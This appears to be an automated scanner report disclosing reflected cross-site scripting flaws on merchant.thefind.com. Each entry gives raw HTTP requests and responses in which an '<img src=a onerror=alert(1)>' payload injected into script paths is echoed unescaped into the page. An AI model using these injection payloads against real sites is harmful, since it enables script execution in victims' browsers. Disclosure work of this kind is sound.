HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:08 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.afd28<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/claim_store |
GET /scriptse817d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:53 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 214 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/claim_store |
GET /scripts/mc10d3b<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:24 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 214 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/claim_store |
GET /scripts/mc/7a9c2<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:14 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.7a9c2<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/init.js |
GET /scripts46cbb<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:35 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 200 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/init.js |
GET /scripts/mc6a988<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:54 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 200 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/init.js |
GET /scripts/mc/c0afe<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:45 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.c0afe<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_common.js |
GET /scripts38646<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:16 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 210 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_common.js |
GET /scripts/mc8007d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:06 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 210 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_common.js |
GET /scripts/mc/b2fd9<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:58 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.b2fd9<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_utils.js |
GET /scripts287f6<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:14 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_utils.js |
GET /scripts/mc5f040<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:05 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/mc_utils.js |
GET /scripts/mc/64d22<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:56 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.64d22<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/prototype.js |
GET /scripts55d72<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 210 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/prototype.js |
GET /scripts/mce9df7<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:10 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 210 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/prototype.js |
GET /scripts/mc/b51fa<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:01 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.b51fa<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/tplmgr/tplmgr.js |
GET /scripts61fdd<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:18 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/tplmgr/tplmgr.js |
GET /scripts/tplmgr44cec<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/tplmgr/tplmgr.js |
GET /scripts/tplmgr/7b3ca<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:50 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9552 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.tplmgr.7b3ca<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/ui/infobox.js |
GET /scriptsc86f3<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:11 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 206 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/ui/infobox.js |
GET /scripts/uic68bc<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:01 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 206 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/ui/infobox.js |
GET /scripts/ui/dbcfb<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:52 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.ui.dbcfb<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ajaxlib.js |
